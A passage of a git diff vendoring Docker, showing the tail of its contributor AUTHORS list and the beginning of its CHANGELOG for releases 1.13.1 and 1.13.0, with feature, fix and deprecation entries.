+Nicolas Dudebout +Nicolas Goy +Nicolas Kaiser +Nicolás Hock Isaza +Nigel Poulton +NikolaMandic +nikolas +Nirmal Mehta +Nishant Totla +NIWA Hideyuki +noducks +Nolan Darilek +nponeccop +Nuutti Kotivuori +nzwsch +O.S. Tezer +objectified +OddBloke +odk- +Oguz Bilgic +Oh Jinkyun +Ohad Schneider +ohmystack +Ole Reifschneider +Oliver Neal +Olivier Gambier +Olle Jonsson +Oriol Francès +orkaa +Oskar Niburski +Otto Kekäläinen +oyld +ozlerhakan +paetling +pandrew +panticz +Paolo G. Giarrusso +Pascal Borreli +Pascal Hartig +Patrick Böänziger +Patrick Devine +Patrick Hemmer +Patrick Stapleton +pattichen +Paul +paul +Paul Annesley +Paul Bellamy +Paul Bowsher +Paul Furtado +Paul Hammond +Paul Jimenez +Paul Lietar +Paul Liljenberg +Paul Morie +Paul Nasrat +Paul Weaver +Paulo Ribeiro +Pavel Lobashov +Pavel Pospisil +Pavel Sutyrin +Pavel Tikhomirov +Pavlos Ratis +Pavol Vargovcik +Peeyush Gupta +Peggy Li +Pei Su +Penghan Wang +perhapszzy@sina.com +pestophagous +Peter Bourgon +Peter Braden +Peter Choi +Peter Dave Hello +Peter Edge +Peter Ericson +Peter Esbensen +Peter Malmgren +Peter Salvatore +Peter Volpe +Peter Waller +Petr Švihlík +Phil +Phil Estes +Phil Spitler +Philip Monroe +Philipp Wahala +Philipp Weissensteiner +Phillip Alexander +pidster +Piergiuliano Bossi +Pierre +Pierre Carrier +Pierre Dal-Pra +Pierre Wacrenier +Pierre-Alain RIVIERE +Piotr Bogdan +pixelistik +Porjo +Poul Kjeldager Sørensen +Pradeep Chhetri +Prasanna Gautam +Prayag Verma +Przemek Hejman +pysqz +qg <1373319223@qq.com> +qhuang +Qiang Huang +qq690388648 <690388648@qq.com> +Quentin Brossard +Quentin Perez +Quentin Tayssier +r0n22 +Rafal Jeczalik +Rafe Colton +Raghavendra K T +Raghuram Devarakonda +Rajat Pandit +Rajdeep Dua +Ralf Sippl +Ralle +Ralph Bean +Ramkumar Ramachandra +Ramon Brooker +Ramon van Alteren +Ray Tsang +ReadmeCritic +Recursive Madman +Regan McCooey +Remi Rampin +Renato Riccieri Santos Zannon +resouer +rgstephens +Rhys Hiltner +Rich Moyse +Rich Seymour +Richard +Richard Burnison +Richard Harvey +Richard Mathie +Richard Metzler +Richard Scothern +Richo Healey +Rick Bradley +Rick van de Loo +Rick Wieman +Rik Nijessen +Riku Voipio +Riley Guerin +Ritesh H Shukla +Riyaz Faizullabhoy +Rob Vesse +Robert Bachmann +Robert Bittle +Robert Obryk +Robert Stern +Robert Terhaar +Robert Wallis +Roberto G. Hashioka +Robin Naundorf +Robin Schneider +Robin Speekenbrink +robpc +Rodolfo Carvalho +Rodrigo Vaz +Roel Van Nyen +Roger Peppe +Rohit Jnagal +Rohit Kadam +Roland Huß +Roland Kammerer +Roland Moriz +Roma Sokolov +Roman Strashkin +Ron Smits +Ron Williams +root +root +root +root +root +Rory Hunter +Rory McCune +Ross Boucher +Rovanion Luckey +Rozhnov Alexandr +rsmoorthy +Rudolph Gottesheim +Rui Lopes +Runshen Zhu +Ryan Anderson +Ryan Aslett +Ryan Belgrave +Ryan Detzel +Ryan Fowler +Ryan McLaughlin +Ryan O'Donnell +Ryan Seto +Ryan Thomas +Ryan Trauntvein +Ryan Wallner +RyanDeng +Rémy Greinhofer +s. rannou +s00318865 +Sabin Basyal +Sachin Joshi +Sagar Hani +Sainath Grandhi +sakeven +Sally O'Malley +Sam Abed +Sam Alba +Sam Bailey +Sam J Sharpe +Sam Neirinck +Sam Reis +Sam Rijs +Sambuddha Basu +Sami Wagiaalla +Samuel Andaya +Samuel Dion-Girardeau +Samuel Karp +Samuel PHAN +Sankar சங்கர் +Sanket Saurav +Santhosh Manohar +sapphiredev +Satnam Singh +satoru +Satoshi Amemiya +Satoshi Tagomori +scaleoutsean +Scott Bessler +Scott Collier +Scott Johnston +Scott Stamp +Scott Walls +sdreyesg +Sean Christopherson +Sean Cronin +Sean OMeara +Sean P. Kane +Sebastiaan van Steenis +Sebastiaan van Stijn +Senthil Kumar Selvaraj +Senthil Kumaran +SeongJae Park +Seongyeol Lim +Serge Hallyn +Sergey Alekseev +Sergey Evstifeev +Serhat Gülçiçek +Sevki Hasirci +Shane Canon +Shane da Silva +shaunol +Shawn Landden +Shawn Siefkas +shawnhe +Shekhar Gulati +Sheng Yang +Shengbo Song +Shev Yan +Shih-Yuan Lee +Shijiang Wei +Shishir Mahajan +Shoubhik Bose +Shourya Sarcar +shuai-z +Shukui Yang +Shuwei Hao +Sian Lerk Lau +sidharthamani +Silas Sewell +Simei He +Simon Eskildsen +Simon Leinen +Simon Taranto +Sindhu S +Sjoerd Langkemper +skaasten +Solganik Alexander +Solomon Hykes +Song Gao +Soshi Katsuta +Soulou +Spencer Brown +Spencer Smith +Sridatta Thatipamala +Sridhar Ratnakumar +Srini Brahmaroutu +srinsriv +Steeve Morin +Stefan Berger +Stefan J. Wernli +Stefan Praszalowicz +Stefan Scherer +Stefan Staudenmeyer +Stefan Weil +Stephen Crosby +Stephen Day +Stephen Drake +Stephen Rust +Steve Durrheimer +Steve Francia +Steve Koch +Steven Burgess +Steven Erenst +Steven Iveson +Steven Merrill +Steven Richards +Steven Taylor +Subhajit Ghosh +Sujith Haridasan +Suryakumar Sudar +Sven Dowideit +Swapnil Daingade +Sylvain Baubeau +Sylvain Bellemare +Sébastien +Sébastien Luttringer +Sébastien Stormacq +Tadej Janež +TAGOMORI Satoshi +tang0th +Tangi COLIN +Tatsuki Sugiura +Tatsushi Inagaki +Taylor Jones +tbonza +Ted M. Young +Tehmasp Chaudhri +Tejesh Mehta +terryding77 <550147740@qq.com> +tgic +Thatcher Peskens +theadactyl +Thell 'Bo' Fowler +Thermionix +Thijs Terlouw +Thomas Bikeev +Thomas Frössman +Thomas Gazagnaire +Thomas Grainger +Thomas Hansen +Thomas Leonard +Thomas LEVEIL +Thomas Orozco +Thomas Riccardi +Thomas Schroeter +Thomas Sjögren +Thomas Swift +Thomas Tanaka +Thomas Texier +Tianon Gravi +Tianyi Wang +Tibor Vass +Tiffany Jernigan +Tiffany Low +Tim Bosse +Tim Dettrick +Tim Düsterhus +Tim Hockin +Tim Ruffles +Tim Smith +Tim Terhorst +Tim Wang +Tim Waugh +Tim Wraight +timfeirg +Timothy Hobbs +tjwebb123 +tobe +Tobias Bieniek +Tobias Bradtke +Tobias Gesellchen +Tobias Klauser +Tobias Munk +Tobias Schmidt +Tobias Schwab +Todd Crane +Todd Lunter +Todd Whiteman +Toli Kuznets +Tom Barlow +Tom Denham +Tom Fotherby +Tom Howe +Tom Hulihan +Tom Maaswinkel +Tom X. Tobin +Tomas Tomecek +Tomasz Kopczynski +Tomasz Lipinski +Tomasz Nurkiewicz +Tommaso Visconti +Tomáš Hrčka +Tonis Tiigi +Tonny Xu +Tony Daws +Tony Miller +toogley +Torstein Husebø +tpng +tracylihui <793912329@qq.com> +Travis Cline +Travis Thieman +Trent Ogren +Trevor +Trevor Pounds +trishnaguha +Tristan Carel +Troy Denton +Tyler Brock +Tzu-Jung Lee +Tõnis Tiigi +Ulysse Carion +unknown +vagrant +Vaidas Jablonskis +Veres Lajos +vgeta +Victor Algaze +Victor Coisne +Victor Costan +Victor I. Wood +Victor Lyuboslavsky +Victor Marmol +Victor Palma +Victor Vieux +Victoria Bialas +Vijaya Kumar K +Viktor Stanchev +Viktor Vojnovski +VinayRaghavanKS +Vincent Batts +Vincent Bernat +Vincent Bernat +Vincent Demeester +Vincent Giersch +Vincent Mayers +Vincent Woo +Vinod Kulkarni +Vishal Doshi +Vishnu Kannan +Vitor Monteiro +Vivek Agarwal +Vivek Dasgupta +Vivek Goyal +Vladimir Bulyga +Vladimir Kirillov +Vladimir Pouzanov +Vladimir Rutsky +Vladimir Varankin +VladimirAus +Vojtech Vitek (V-Teq) +waitingkuo +Walter Leibbrandt +Walter Stanish +WANG Chao +Wang Xing +Ward Vandewege +WarheadsSE +Wayne Chang +Wei-Ting Kuo +weiyan +Weiyang Zhu +Wen Cheng Ma +Wendel Fleming +Wenkai Yin +Wenxuan Zhao +Wenyu You <21551128@zju.edu.cn> +Wes Morgan +Will Dietz +Will Rouesnel +Will Weaver +willhf +William Delanoue +William Henry +William Hubbs +William Riancho +William Thurston +WiseTrem +wlan0 +Wolfgang Powisch +wonderflow +Wonjun Kim +xamyzhao +Xianlu Bird +XiaoBing Jiang +Xiaoxu Chen +xiekeyang +Xinzi Zhou +Xiuming Chen +xlgao-zju +xuzhaokui +Yahya +YAMADA Tsuyoshi +Yan Feng +Yang Bai +yangshukui +Yanqiang Miao +Yasunori Mahata +Yestin Sun +Yi EungJun +Yibai Zhang +Yihang Ho +Ying Li +Yohei Ueda +Yong Tang +Yongzhi Pan +yorkie +Youcef YEKHLEF +Yuan Sun +yuchangchun +yuchengxia +yuexiao-wang +YuPengZTE +Yurii Rashkovskii +yuzou +Zac Dover +Zach Borboa +Zachary Jaffee +Zain Memon +Zaiste! +Zane DeGraffenried +Zefan Li +Zen Lin(Zhinan Lin) +Zhang Kun +Zhang Wei +Zhang Wentao +Zhenan Ye <21551168@zju.edu.cn> +zhouhao +Zhu Guihua +Zhuoyun Wei +Zilin Du +zimbatm +Ziming Dong +ZJUshuaizhou <21551191@zju.edu.cn> +zmarouf +Zoltan Tombol +zqh +Zuhayr Elahi +Zunayed Ali +Álex González +Álvaro Lázaro +Átila Camurça Alves +尹吉峰 +搏通 diff --git a/vendor/github.com/docker/docker/CHANGELOG.md b/vendor/github.com/docker/docker/CHANGELOG.md new file mode 100644 index 0000000000..36bb880639 --- /dev/null +++ b/vendor/github.com/docker/docker/CHANGELOG.md @@ -0,0 +1,3337 @@ +# Changelog + +Items starting with `DEPRECATE` are important deprecation notices. For more +information on the list of deprecated flags and APIs please have a look at +https://docs.docker.com/engine/deprecated/ where target removal dates can also +be found. + +## 1.13.1 (2017-02-08) + +**IMPORTANT**: On Linux distributions where `devicemapper` was the default storage driver, +the `overlay2`, or `overlay` is now used by default (if the kernel supports it). +To use devicemapper, you can manually configure the storage driver to use through +the `--storage-driver` daemon option, or by setting "storage-driver" in the `daemon.json` +configuration file. + +**IMPORTANT**: In Docker 1.13, the managed plugin api changed, as compared to the experimental +version introduced in Docker 1.12. You must **uninstall** plugins which you installed with Docker 1.12 +_before_ upgrading to Docker 1.13. You can uninstall plugins using the `docker plugin rm` command. + +If you have already upgraded to Docker 1.13 without uninstalling +previously-installed plugins, you may see this message when the Docker daemon +starts: + + Error starting daemon: json: cannot unmarshal string into Go value of type types.PluginEnv + +To manually remove all plugins and resolve this problem, take the following steps: + +1. Remove plugins.json from: `/var/lib/docker/plugins/`. +2. Restart Docker. Verify that the Docker daemon starts with no errors. +3. Reinstall your plugins. + +### Contrib + +* Do not require a custom build of tini [#28454](https://github.com/docker/docker/pull/28454) +* Upgrade to Go 1.7.5 [#30489](https://github.com/docker/docker/pull/30489) + +### Remote API (v1.26) & Client + ++ Support secrets in docker stack deploy with compose file [#30144](https://github.com/docker/docker/pull/30144) + +### Runtime + +* Fix size issue in `docker system df` [#30378](https://github.com/docker/docker/pull/30378) +* Fix error on `docker inspect` when Swarm certificates were expired. [#29246](https://github.com/docker/docker/pull/29246) +* Fix deadlock on v1 plugin with activate error [#30408](https://github.com/docker/docker/pull/30408) +* Fix SELinux regression [#30649](https://github.com/docker/docker/pull/30649) + +### Plugins + +* Support global scoped network plugins (v2) in swarm mode [#30332](https://github.com/docker/docker/pull/30332) ++ Add `docker plugin upgrade` [#29414](https://github.com/docker/docker/pull/29414) + +### Windows + +* Fix small regression with old plugins in Windows [#30150](https://github.com/docker/docker/pull/30150) +* Fix warning on Windows [#30730](https://github.com/docker/docker/pull/30730) + +## 1.13.0 (2017-01-18) + +**IMPORTANT**: On Linux distributions where `devicemapper` was the default storage driver, +the `overlay2`, or `overlay` is now used by default (if the kernel supports it). +To use devicemapper, you can manually configure the storage driver to use through +the `--storage-driver` daemon option, or by setting "storage-driver" in the `daemon.json` +configuration file. + +**IMPORTANT**: In Docker 1.13, the managed plugin api changed, as compared to the experimental +version introduced in Docker 1.12. You must **uninstall** plugins which you installed with Docker 1.12 +_before_ upgrading to Docker 1.13. You can uninstall plugins using the `docker plugin rm` command. + +If you have already upgraded to Docker 1.13 without uninstalling +previously-installed plugins, you may see this message when the Docker daemon +starts: + + Error starting daemon: json: cannot unmarshal string into Go value of type types.PluginEnv + +To manually remove all plugins and resolve this problem, take the following steps: + +1. Remove plugins.json from: `/var/lib/docker/plugins/`. +2. Restart Docker. Verify that the Docker daemon starts with no errors. +3. Reinstall your plugins. + +### Builder + ++ Add capability to specify images used as a cache source on build. These images do not need to have local parent chain and can be pulled from other registries [#26839](https://github.com/docker/docker/pull/26839) ++ (experimental) Add option to squash image layers to the FROM image after successful builds [#22641](https://github.com/docker/docker/pull/22641) +* Fix dockerfile parser with empty line after escape [#24725](https://github.com/docker/docker/pull/24725) +- Add step number on `docker build` [#24978](https://github.com/docker/docker/pull/24978) ++ Add support for compressing build context during image build [#25837](https://github.com/docker/docker/pull/25837) ++ add `--network` to `docker build` [#27702](https://github.com/docker/docker/pull/27702) +- Fix inconsistent behavior between `--label` flag on `docker build` and `docker run` [#26027](https://github.com/docker/docker/issues/26027) +- Fix image layer inconsistencies when using the overlay storage driver [#27209](https://github.com/docker/docker/pull/27209) +* Unused build-args are now allowed. A warning is presented instead of an error and failed build [#27412](https://github.com/docker/docker/pull/27412) +- Fix builder cache issue on Windows [#27805](https://github.com/docker/docker/pull/27805) ++ Allow `USER` in builder on Windows [#28415](https://github.com/docker/docker/pull/28415) ++ Handle env case-insensitive on Windows [#28725](https://github.com/docker/docker/pull/28725) + +### Contrib + ++ Add support for building docker debs for Ubuntu 16.04 Xenial on PPC64LE [#23438](https://github.com/docker/docker/pull/23438) ++ Add support for building docker debs for Ubuntu 16.04 Xenial on s390x [#26104](https://github.com/docker/docker/pull/26104) ++ Add support for building docker debs for Ubuntu 16.10 Yakkety Yak on PPC64LE [#28046](https://github.com/docker/docker/pull/28046) +- Add RPM builder for VMWare Photon OS [#24116](https://github.com/docker/docker/pull/24116) ++ Add shell completions to tgz [#27735](https://github.com/docker/docker/pull/27735) +* Update the install script to allow using the mirror in China [#27005](https://github.com/docker/docker/pull/27005) ++ Add DEB builder for Ubuntu 16.10 Yakkety Yak [#27993](https://github.com/docker/docker/pull/27993) ++ Add RPM builder for Fedora 25 [#28222](https://github.com/docker/docker/pull/28222) ++ Add `make deb` support for aarch64 [#27625](https://github.com/docker/docker/pull/27625) + +### Distribution + +* Update notary dependency to 0.4.2 (full changelogs [here](https://github.com/docker/notary/releases/tag/v0.4.2)) [#27074](https://github.com/docker/docker/pull/27074) + - Support for compilation on windows [docker/notary#970](https://github.com/docker/notary/pull/970) + - Improved error messages for client authentication errors [docker/notary#972](https://github.com/docker/notary/pull/972) + - Support for finding keys that are anywhere in the `~/.docker/trust/private` directory, not just under `~/.docker/trust/private/root_keys` or `~/.docker/trust/private/tuf_keys` [docker/notary#981](https://github.com/docker/notary/pull/981) + - Previously, on any error updating, the client would fall back on the cache. Now we only do so if there is a network error or if the server is unavailable or missing the TUF data. Invalid TUF data will cause the update to fail - for example if there was an invalid root rotation. [docker/notary#982](https://github.com/docker/notary/pull/982) + - Improve root validation and yubikey debug logging [docker/notary#858](https://github.com/docker/notary/pull/858) [docker/notary#891](https://github.com/docker/notary/pull/891) + - Warn if certificates for root or delegations are near expiry [docker/notary#802](https://github.com/docker/notary/pull/802) + - Warn if role metadata is near expiry [docker/notary#786](https://github.com/docker/notary/pull/786) + - Fix passphrase retrieval attempt counting and terminal detection [docker/notary#906](https://github.com/docker/notary/pull/906) +- Avoid unnecessary blob uploads when different users push same layers to authenticated registry [#26564](https://github.com/docker/docker/pull/26564) +* Allow external storage for registry credentials [#26354](https://github.com/docker/docker/pull/26354) + +### Logging + +* Standardize the default logging tag value in all logging drivers [#22911](https://github.com/docker/docker/pull/22911) +- Improve performance and memory use when logging of long log lines [#22982](https://github.com/docker/docker/pull/22982) ++ Enable syslog driver for windows [#25736](https://github.com/docker/docker/pull/25736) ++ Add Logentries Driver [#27471](https://github.com/docker/docker/pull/27471) ++ Update of AWS log driver to support tags [#27707](https://github.com/docker/docker/pull/27707) ++ Unix socket support for fluentd [#26088](https://github.com/docker/docker/pull/26088) +* Enable fluentd logging driver on Windows [#28189](https://github.com/docker/docker/pull/28189) +- Sanitize docker labels when used as journald field names [#23725](https://github.com/docker/docker/pull/23725) +- Fix an issue where `docker logs --tail` returned less lines than expected [#28203](https://github.com/docker/docker/pull/28203) +- Splunk Logging Driver: performance and reliability improvements [#26207](https://github.com/docker/docker/pull/26207) +- Splunk Logging Driver: configurable formats and skip for verifying connection [#25786](https://github.com/docker/docker/pull/25786) + +### Networking + ++ Add `--attachable` network support to enable `docker run` to work in swarm-mode overlay network [#25962](https://github.com/docker/docker/pull/25962) ++ Add support for host port PublishMode in services using the `--publish` option in `docker service create` [#27917](https://github.com/docker/docker/pull/27917) and [#28943](https://github.com/docker/docker/pull/28943) ++ Add support for Windows server 2016 overlay network driver (requires upcoming ws2016 update) [#28182](https://github.com/docker/docker/pull/28182) +* Change the default `FORWARD` policy to `DROP` [#28257](https://github.com/docker/docker/pull/28257) ++ Add support for specifying static IP addresses for predefined network on windows [#22208](https://github.com/docker/docker/pull/22208) +- Fix `--publish` flag on `docker run` not working with IPv6 addresses [#27860](https://github.com/docker/docker/pull/27860) +- Fix inspect network show gateway with mask [#25564](https://github.com/docker/docker/pull/25564) +- Fix an issue where multiple addresses in a bridge may cause `--fixed-cidr` to not have the correct addresses [#26659](https://github.com/docker/docker/pull/26659) ++ Add creation timestamp to `docker network inspect` [#26130](https://github.com/docker/docker/pull/26130) +- Show peer nodes in `docker network inspect` for swarm overlay networks [#28078](https://github.com/docker/docker/pull/28078) +- Enable ping for service VIP address [#28019](https://github.com/docker/docker/pull/28019) + +### Plugins + +- Move plugins out of experimental [#28226](https://github.com/docker/docker/pull/28226) +- Add `--force` on `docker plugin remove` [#25096](https://github.com/docker/docker/pull/25096) +* Add support for dynamically reloading authorization plugins [#22770](https://github.com/docker/docker/pull/22770) ++ Add description in `docker plugin ls` [#25556](https://github.com/docker/docker/pull/25556) ++ Add `-f`/`--format` to `docker plugin inspect` [#25990](https://github.com/docker/docker/pull/25990) ++ Add `docker plugin create` command [#28164](https://github.com/docker/docker/pull/28164) +* Send request's TLS peer certificates to authorization plugins [#27383](https://github.com/docker/docker/pull/27383) +* Support for global-scoped network and ipam plugins in swarm-mode [#27287](https://github.com/docker/docker/pull/27287) +* Split `docker plugin install` into two API call `/privileges` and `/pull` [#28963](https://github.com/docker/docker/pull/28963) + +### Remote API (v1.25) & Client + ++ Support `docker stack deploy` from a Compose file [#27998](https://github.com/docker/docker/pull/27998) ++ (experimental) Implement checkpoint and restore [#22049](https://github.com/docker/docker/pull/22049) ++ Add `--format` flag to `docker info` [#23808](https://github.com/docker/docker/pull/23808) +* Remove `--name` from `docker volume create` [#23830](https://github.com/docker/docker/pull/23830) ++ Add `docker stack ls` [#23886](https://github.com/docker/docker/pull/23886) ++ Add a new `is-task` ps filter [#24411](https://github.com/docker/docker/pull/24411) ++ Add `--env-file` flag to `docker service create` [#24844](https://github.com/docker/docker/pull/24844) ++ Add `--format` on `docker stats` [#24987](https://github.com/docker/docker/pull/24987) ++ Make `docker node ps` default to `self` in swarm node [#25214](https://github.com/docker/docker/pull/25214) ++ Add `--group` in `docker service create` [#25317](https://github.com/docker/docker/pull/25317) ++ Add `--no-trunc` to service/node/stack ps output [#25337](https://github.com/docker/docker/pull/25337) ++ Add Logs to `ContainerAttachOptions` so go clients can request to retrieve container logs as part of the attach process [#26718](https://github.com/docker/docker/pull/26718) ++ Allow client to talk to an older server [#27745](https://github.com/docker/docker/pull/27745) +* Inform user client-side that a container removal is in progress [#26074](https://github.com/docker/docker/pull/26074) ++ Add `Isolation` to the /info endpoint [#26255](https://github.com/docker/docker/pull/26255) ++ Add `userns` to the /info endpoint [#27840](https://github.com/docker/docker/pull/27840) +- Do not allow more than one mode be requested at once in the services endpoint [#26643](https://github.com/docker/docker/pull/26643) ++ Add capability to /containers/create API to specify mounts in a more granular and safer way [#22373](https://github.com/docker/docker/pull/22373) ++ Add `--format` flag to `network ls` and `volume ls` [#23475](https://github.com/docker/docker/pull/23475) +* Allow the top-level `docker inspect` command to inspect any kind of resource [#23614](https://github.com/docker/docker/pull/23614) ++ Add --cpus flag to control cpu resources for `docker run` and `docker create`, and add `NanoCPUs` to `HostConfig` [#27958](https://github.com/docker/docker/pull/27958) +- Allow unsetting the `--entrypoint` in `docker run` or `docker create` [#23718](https://github.com/docker/docker/pull/23718) +* Restructure CLI commands by adding `docker image` and `docker container` commands for more consistency [#26025](https://github.com/docker/docker/pull/26025) +- Remove `COMMAND` column from `service ls` output [#28029](https://github.com/docker/docker/pull/28029) ++ Add `--format` to `docker events` [#26268](https://github.com/docker/docker/pull/26268) +* Allow specifying multiple nodes on `docker node ps` [#26299](https://github.com/docker/docker/pull/26299) +* Restrict fractional digits to 2 decimals in `docker images` output [#26303](https://github.com/docker/docker/pull/26303) ++ Add `--dns-option` to `docker run` [#28186](https://github.com/docker/docker/pull/28186) ++ Add Image ID to container commit event [#28128](https://github.com/docker/docker/pull/28128) ++ Add external binaries version to docker info [#27955](https://github.com/docker/docker/pull/27955) ++ Add information for `Manager Addresses` in the output of `docker info` [#28042](https://github.com/docker/docker/pull/28042) ++ Add a new reference filter for `docker images` [#27872](https://github.com/docker/docker/pull/27872) + +### Runtime + ++ Add `--experimental` daemon flag to enable experimental features, instead of shipping them in a separate build [#27223](https://github.com/docker/docker/pull/27223) ++ Add a `--shutdown-timeout` daemon flag to specify the default timeout (in seconds) to stop containers gracefully before daemon exit [#23036](https://github.com/docker/docker/pull/23036) ++ Add `--stop-timeout` to specify the timeout value (in seconds) for individual containers to stop [#22566](https://github.com/docker/docker/pull/22566) ++ Add a new daemon flag `--userland-proxy-path` to allow configuring the userland proxy instead of using the hardcoded `docker-proxy` from `$PATH` [#26882](https://github.com/docker/docker/pull/26882) ++ Add boolean flag `--init` on `dockerd` and on `docker run` to use [tini](https://github.com/krallin/tini) a zombie-reaping init process as PID 1 [#26061](https://github.com/docker/docker/pull/26061) [#28037](https://github.com/docker/docker/pull/28037) ++ Add a new daemon flag `--init-path` to allow configuring the path to the `docker-init` binary [#26941](https://github.com/docker/docker/pull/26941) ++ Add support for live reloading insecure registry in configuration [#22337](https://github.com/docker/docker/pull/22337) ++ Add support for storage-opt size on Windows daemons [#23391](https://github.com/docker/docker/pull/23391) +* Improve reliability of `docker run --rm` by moving it from the client to the daemon [#20848](https://github.com/docker/docker/pull/20848) ++ Add support for `--cpu-rt-period` and `--cpu-rt-runtime` flags, allowing containers to run real-time threads when `CONFIG_RT_GROUP_SCHED` is enabled in the kernel [#23430](https://github.com/docker/docker/pull/23430) +* Allow parallel stop, pause, unpause [#24761](https://github.com/docker/docker/pull/24761) / [#26778](https://github.com/docker/docker/pull/26778) +* Implement XFS quota for overlay2 [#24771](https://github.com/docker/docker/pull/24771) +- Fix partial/full filter issue in `service tasks --filter` [#24850](https://github.com/docker/docker/pull/24850) +- Allow engine to run inside a user namespace [#25672](https://github.com/docker/docker/pull/25672) +- Fix a race condition between device deferred removal and resume device, when using the devicemapper graphdriver [#23497](https://github.com/docker/docker/pull/23497) +- Add `docker stats` support in Windows [#25737](https://github.com/docker/docker/pull/25737) +- Allow using `--pid=host` and `--net=host` when `--userns=host` [#25771](https://github.com/docker/docker/pull/25771) ++ (experimental) Add metrics (Prometheus) output for basic `container`, `image`, and `daemon` operations [#25820](https://github.com/docker/docker/pull/25820) +- Fix issue in `docker stats` with `NetworkDisabled=true` [#25905](https://github.com/docker/docker/pull/25905) ++ Add `docker top` support in Windows [#25891](https://github.com/docker/docker/pull/25891) ++ Record pid of exec'd process [#27470](https://github.com/docker/docker/pull/27470) ++ Add support for looking up user/groups via `getent` [#27599](https://github.com/docker/docker/pull/27599) ++ Add new `docker system` command with `df` and `prune` subcommands for system resource management, as well as `docker {container,image,volume,network} prune` subcommands [#26108](https://github.com/docker/docker/pull/26108) [#27525](https://github.com/docker/docker/pull/27525) / [#27525](https://github.com/docker/docker/pull/27525) +- Fix an issue where containers could not be stopped or killed by setting xfs max_retries to 0 upon ENOSPC with devicemapper [#26212](https://github.com/docker/docker/pull/26212) +- Fix `docker cp` failing to copy to a container's volume dir on CentOS with devicemapper [#28047](https://github.com/docker/docker/pull/28047) +* Promote overlay(2) graphdriver [#27932](https://github.com/docker/docker/pull/27932) ++ Add `--seccomp-profile` daemon flag to specify a path to a seccomp profile that overrides the default [#26276](https://github.com/docker/docker/pull/26276) +- Fix ulimits in `docker inspect` when `--default-ulimit` is set on daemon [#26405](https://github.com/docker/docker/pull/26405) +- Add workaround for overlay issues during build in older kernels [#28138](https://github.com/docker/docker/pull/28138) ++ Add `TERM` environment variable on `docker exec -t` [#26461](https://github.com/docker/docker/pull/26461) +* Honor a container’s `--stop-signal` setting upon `docker kill` [#26464](https://github.com/docker/docker/pull/26464) + +### Swarm Mode + ++ Add secret management [#27794](https://github.com/docker/docker/pull/27794) ++ Add support for templating service options (hostname, mounts, and environment variables) [#28025](https://github.com/docker/docker/pull/28025) +* Display the endpoint mode in the output of `docker service inspect --pretty` [#26906](https://github.com/docker/docker/pull/26906) +* Make `docker service ps` output more bearable by shortening service IDs in task names [#28088](https://github.com/docker/docker/pull/28088) +* Make `docker node ps` default to the current node [#25214](https://github.com/docker/docker/pull/25214) ++ Add `--dns`, -`-dns-opt`, and `--dns-search` to service create. [#27567](https://github.com/docker/docker/pull/27567) ++ Add `--force` to `docker service update` [#27596](https://github.com/docker/docker/pull/27596) ++ Add `--health-*` and `--no-healthcheck` flags to `docker service create` and `docker service update` [#27369](https://github.com/docker/docker/pull/27369) ++ Add `-q` to `docker service ps` [#27654](https://github.com/docker/docker/pull/27654) +* Display number of global services in `docker service ls` [#27710](https://github.com/docker/docker/pull/27710) +- Remove `--name` flag from `docker service update`. This flag is only functional on `docker service create`, so was removed from the `update` command [#26988](https://github.com/docker/docker/pull/26988) +- Fix worker nodes failing to recover because of transient networking issues [#26646](https://github.com/docker/docker/issues/26646) +* Add support for health aware load balancing and DNS records [#27279](https://github.com/docker/docker/pull/27279) ++ Add `--hostname` to `docker service create` [#27857](https://github.com/docker/docker/pull/27857) ++ Add `--host` to `docker service create`, and `--host-add`, `--host-rm` to `docker service update` [#28031](https://github.com/docker/docker/pull/28031) ++ Add `--tty` flag to `docker service create`/`update` [#28076](https://github.com/docker/docker/pull/28076) +* Autodetect, store, and expose node IP address as seen by the manager [#27910](https://github.com/docker/docker/pull/27910) +* Encryption at rest of manager keys and raft data [#27967](https://github.com/docker/docker/pull/27967) ++ Add `--update-max-failure-ratio`, `--update-monitor` and `--rollback` flags to `docker service update` [#26421](https://github.com/docker/docker/pull/26421) +- Fix an issue with address autodiscovery on `docker swarm init` running inside a container [#26457](https://github.com/docker/docker/pull/26457) ++ (experimental) Add `docker service logs` command to view logs for a service [#28089](https://github.com/docker/docker/pull/28089) ++ Pin images by digest for `docker service create` and `update` [#28173](https://github.com/docker/docker/pull/28173) +* Add short (`-f`) flag for `docker node rm --force` and `docker swarm leave --force` [#28196](https://github.com/docker/docker/pull/28196) ++ Add options to customize Raft snapshots (`--max-snapshots`, `--snapshot-interval`) [#27997](https://github.com/docker/docker/pull/27997) +- Don't repull image if pinned by digest [#28265](https://github.com/docker/docker/pull/28265) ++ Swarm-mode support for Windows [#27838](https://github.com/docker/docker/pull/27838) ++ Allow hostname to be updated on service [#28771](https://github.com/docker/docker/pull/28771) ++ Support v2 plugins [#29433](https://github.com/docker/docker/pull/29433) ++ Add content trust for services [#29469](https://github.com/docker/docker/pull/29469) + +### Volume + ++ Add support for labels on volumes [#21270](https://github.com/docker/docker/pull/21270) ++ Add support for filtering volumes by label [#25628](https://github.com/docker/docker/pull/25628) +* Add a `--force` flag in `docker volume rm` to forcefully purge the data of the volume that has already been deleted [#23436](https://github.com/docker/docker/pull/23436) +* Enhance `docker volume inspect` to show all options used when creating the volume [#26671](https://github.com/docker/docker/pull/26671) +* Add support for local NFS volumes to resolve hostnames [#27329](https://github.com/docker/docker/pull/27329) + +### Security + +- Fix selinux labeling of volumes shared in a container [#23024](https://github.com/docker/docker/pull/23024) +- Prohibit `/sys/firmware/**` from being accessed with apparmor [#26618](https://github.com/docker/docker/pull/26618) + +### DEPRECATION + +- Marked the `docker daemon` command as deprecated. The daemon is moved to a separate binary (`dockerd`), and should be used instead [#26834](https://github.com/docker/docker/pull/26834) +- Deprecate unversioned API endpoints [#28208](https://github.com/docker/docker/pull/28208) +- Remove Ubuntu 15.10 (Wily Werewolf) as supported platform. Ubuntu 15.10 is EOL, and no longer receives updates [#27042](https://github.com/docker/docker/pull/27042) +- Remove Fedora 22 as supported platform. Fedora 22 is EOL, and no longer receives updates [#27432](https://github.com/docker/docker/pull/27432) +- Remove Fedora 23 as supported platform. Fedora 23 is EOL, and no longer receives updates [#29455](https://github.com/docker/docker/pull/29455) +- Deprecate the `repo:shortid` syntax on `docker pull` [#27207](https://github.com/docker/docker/pull/27207) +- Deprecate backing filesystem without `d_type` for overlay and overlay2 storage drivers [#27433](https://github.com/docker/docker/pull/27433) +- Deprecate `MAINTAINER` in Dockerfile [#25466](https://github.com/docker/docker/pull/25466) +- Deprecate `filter` param for endpoint `/images/json` [#27872](https://github.com/docker/docker/pull/27872) +- Deprecate setting duplicate engine labels 